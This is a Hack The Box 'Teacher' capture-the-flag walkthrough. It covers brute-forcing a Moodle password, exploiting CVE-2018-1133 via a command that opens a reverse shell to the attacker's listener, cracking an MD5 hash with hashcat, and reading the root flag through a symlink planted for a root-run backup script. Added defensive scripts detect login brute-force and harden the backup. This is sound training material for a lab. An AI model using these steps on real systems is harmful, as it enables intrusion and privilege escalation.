/var/log $ cat "Hack The Box - Teacher Walkthrough"
2019-04-20 | hackthebox ctf
tl;dr
- Find partial credentials in a file named as image.
- Find the login form where those credentials can be used.
- Confirm the username.
- Bruteforce the last character of the password.
- Find an exploit to get a reverse shell.
- Extract the Linux user password hash from the SQL database.
- Crack the hash to get access to the user flag.
- Find a script being executed as root.
- Abuse the script to get the root flag.
Tools used: masscan, nmap, gobuster, crunch, burp, mysql, hashcat, pspy
Machine Info
Initial Recon
Searching for open ports with masscan just shows port 80 open. Scanning it with nmap does not give us much more information:
Own User
Initial Enumeration
As there’s only port 80 open, that is the only point to start. And this is what we find there:
When looking through the website we find something odd on the ‘Gallery’ page, a console output:
Viewing the source of http://10.10.10.153/gallery.html we can find the responsible JavaScript:
Trying to open the image in the browser isn’t possible. But it’s there. Using curl to get it gives us something very useful:
Now we know that there is a ‘Giovanni’ who has the password ‘Th4C00lTheachaX’. But he forgot what X was. So next we need to find a place where we can use this information.
Finding Moodle
Doing a gobuster run we find the following directories:
/images, /fonts, /css and /js give us listings of the files used for the website. /javascript, /phpmyadmin and /server-status aren’t directly accessible. This leaves /moodle to explore. And indeed there is another website:
Moodle is an open-source learning management platform. You can find it here. Let’s see if we can confirm that ‘giovanni’ is a valid username by using the ‘Forgotten password’ function. First by trying one that is definitely false:
The developers have thought about the possible misuse of that kind of function and only provide a very generic message to prevent username enumeration:
Trying ‘giovanni’ anyway leads to something unexpected:
Following the provided link for more information reveals an interesting fact: “This error is shown when the server fails to send the email to the requested email id containing details about how to reset the password. This is most likely a server issue.” So we can assume the username ‘giovanni’ is indeed valid.
Bruteforcing Giovanni’s Password
As we nearly know the complete password, bruteforcing the last missing character shouldn’t be too much of an effort. Therefore we create a custom password wordlist by appending every printable character to ‘Th4C00lTheacha’ (e.g. with crunch). Then we use Burp Intruder (Sniper attack), set the payload to our custom wordlist and let it run. As it turns out there is all kind of different output, but one sticks out:
So let’s confirm that ‘Th4C00lTheacha#’ is the password for ‘giovanni’ by logging in:
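From the defender’s side, an Intruder run like the one above leaves a dense burst of POSTs to the Moodle login form in the web server’s access log. The following is an added example, not part of the original walkthrough: a POSIX shell/awk check that flags any source IP sending a threshold number of such POSTs within one minute. The log lines, the 10.10.14.7 client and the threshold of 10 are constructed for the example.

```shell
#!/bin/sh
# Added example (not part of the original walkthrough): spot a login
# brute-force in an Apache access log by counting POSTs to the Moodle
# login form per source IP and per minute. Log lines are constructed;
# the threshold is a hypothetical value.

LOGIN_PATH='/moodle/login/index.php'

# Print "IP dd/Mon/yyyy:HH:MM count" for every (IP, minute) bucket whose
# POST count to $LOGIN_PATH reaches THRESHOLD (default 10).
# Usage: detect_login_bruteforce LOGFILE [THRESHOLD]
detect_login_bruteforce() {
    logfile="$1"; threshold="${2:-10}"
    awk -v path="$LOGIN_PATH" -v thr="$threshold" '
        # CLF: ip - - [dd/Mon/yyyy:HH:MM:SS +0000] "METHOD path HTTP/x" status bytes
        $6 == "\"POST" && $7 == path {
            minute = substr($4, 2, 17)   # drop the leading "[" and the ":SS"
            n[$1 " " minute]++
        }
        END { for (k in n) if (n[k] >= thr) print k, n[k] }
    ' "$logfile" | sort
}

# Constructed sample: one client submits the form 12 times in one minute,
# a normal user loads the page once and logs in once.
write_sample_log() {
    out="$1"
    : > "$out"
    i=0
    while [ "$i" -lt 12 ]; do
        printf '10.10.15.146 - - [20/Apr/2019:10:00:%02d +0000] "POST %s HTTP/1.1" 303 512\n' \
            "$i" "$LOGIN_PATH" >> "$out"
        i=$((i + 1))
    done
    printf '10.10.14.7 - - [20/Apr/2019:10:00:05 +0000] "GET %s HTTP/1.1" 200 4096\n' \
        "$LOGIN_PATH" >> "$out"
    printf '10.10.14.7 - - [20/Apr/2019:10:00:09 +0000] "POST %s HTTP/1.1" 303 512\n' \
        "$LOGIN_PATH" >> "$out"
}

# Stand-alone run: write the sample log, then report offenders.
sample_log=$(mktemp)
write_sample_log "$sample_log"
detect_login_bruteforce "$sample_log" 10
rm -f "$sample_log"
```

On a real server the same check runs over the live access log, and Moodle’s own login lockout setting covers the case where the attacker rotates source addresses.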
Finding a Vulnerability and Exploitation
Giovanni gives the course ‘Algebra’ and apparently he wants to do a quiz with his class tomorrow, as he wrote in a message to the admin:
Taking this as a hint while searching for possible vulnerabilities we find CVE-2018-1133. Moodle prior to 3.5.0 has an RCE vulnerability in the quiz component’s handling of math formulas. Details about it can be found in Robin Peraglie’s post Evil Teacher: Code Injection in Moodle. And there’s also a working exploit titled Moodle v3.4.1 RCE Exploit from Darryn Ten available.
Let’s give it a shot and see if it works. For the exploit we need a valid course id. The id of ‘Algebra’ is 2. We start a listener and run the exploit with the command php moodleexploit.php url=http://10.10.10.153/moodle user=Giovanni pass=Th4C00lTheacha# ip=10.10.15.146 port=42424 course=2 and if everything goes well we have a shell:
Privilege Escalation to User Flag
Unfortunately ‘www-data’ has no permission for /home/giovanni. This means we need to get the Linux password for user ‘giovanni’ (or root) to get to the user flag.
From the file /var/www/html/moodle/config.php we can find the credentials for the MariaDB database:
Using the MariaDB CLI tool mysql to enumerate the contents of the database ‘moodle’ we can find a suspicious user (id = 1337) named ‘Giovannibak’:
hash-identifier guesses that 7a860966115182402ed06375cf0a22af is most likely an MD5 hash:
Cracking the hash using hashcat -m 0 -a 0 -o giovannibak.txt giovannibak.hash /usr/share/wordlists/rockyou.txt we get expelled.
After spawning an interactive shell we can su giovanni using the password expelled and get the user flag:
Own root
When observing what is going on in /home/giovanni/work/tmp we see an archive being created and the permissions changing every minute. Using pspy we find the script responsible for this (/usr/bin/backup.sh), which is executed as root:
To obtain the root flag we simply create a symbolic link in /home/giovanni/work/courses with ln -s /root/root.txt toor.txt and wait for the script to be executed. Then we have the flag in /home/giovanni/work/tmp/courses/toor.txt:
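The walkthrough does not reproduce backup.sh, so here is an added example (not the box’s script) of how a root-run backup of a user-writable directory can be written so that a planted link such as toor.txt cannot pull its target into the output: it refuses trees containing symbolic links, names the source directory instead of expanding a wildcard, and restores nothing with root ownership or world-writable modes. All paths and the demo tree are hypothetical.

```shell
#!/bin/sh
# Added example, not the box's /usr/bin/backup.sh (which the walkthrough
# does not reproduce): a root-run backup of a user-writable directory that
# refuses to archive a tree containing symbolic links, so a planted link
# such as toor.txt -> /root/root.txt is never copied into the output.
# Paths are hypothetical; no recursive chmod 777 is applied to the result.

# Return 0 when DIR exists and contains no symbolic link at any depth.
# find -type l matches the link itself and does not follow it.
no_symlinks() {
    dir="$1"
    [ -d "$dir" ] || return 1
    [ -z "$(find "$dir" -type l -print 2>/dev/null | head -n 1)" ]
}

# safe_backup SRC_DIR DEST_TAR EXTRACT_DIR
# Archive SRC_DIR (by name, not via a shell wildcard) into DEST_TAR and
# unpack it under EXTRACT_DIR without restoring owners or modes.
safe_backup() {
    src="$1"; dest_tar="$2"; extract_dir="$3"
    if ! no_symlinks "$src"; then
        echo "refusing to back up $src: symbolic link found" >&2
        return 1
    fi
    tar -C "$(dirname "$src")" -czf "$dest_tar" "$(basename "$src")" || return 1
    mkdir -p "$extract_dir" || return 1
    tar -C "$extract_dir" -xzf "$dest_tar" --no-same-owner --no-same-permissions || return 1
}

# Stand-alone demo: a clean tree is backed up, a tree with a link is rejected.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/courses"
echo "algebra" > "$demo_dir/courses/algebra.txt"
safe_backup "$demo_dir/courses" "$demo_dir/backup.tar.gz" "$demo_dir/tmp" && echo "clean tree archived"
ln -s ../../secret "$demo_dir/courses/toor.txt"
safe_backup "$demo_dir/courses" "$demo_dir/backup2.tar.gz" "$demo_dir/tmp2" || echo "tree with link rejected"
rm -rf "$demo_dir"
```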
Whoever wants to know more about wildcard misuse: the articles Exploiting Wildcard for Privilege Escalation and Back To The Future: Unix Wildcards Gone Wild give a good overview.